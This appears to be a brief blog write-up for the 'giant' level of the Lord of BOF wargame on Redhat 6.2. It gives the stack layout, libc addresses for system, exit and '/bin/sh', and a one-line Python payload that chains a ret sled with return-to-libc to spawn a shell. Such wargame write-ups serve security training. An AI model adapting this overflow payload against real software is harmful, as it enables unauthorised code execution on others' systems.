giant - no stack, no RTL
Stack : buffer[40] + sfp[4] + ret[4]
ret : 0x804851e
system : 0x40058ae0
exit : 0x400391e0
"/bin/sh" : 0x400fbff9
Payload : ./assassin `python -c 'print "A"*44 + "\x1e\x85\x04\x08" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`
Using Ret sled + RTL
'Wargames > Load Of BOF' 카테고리의 다른 글
| LOB Redhat 6.2 - zombie_assassin (0) | 2015.10.30 |
|---|---|
| LOB Redhat 6.2 - assassin (0) | 2015.10.30 |
| LOB Redhat 6.2 - bugbear (0) | 2015.10.30 |
| LOB Redhat 6.2 - darkknight (0) | 2015.10.29 |
| LOB Redhat 6.2 - golem (0) | 2015.10.29 |
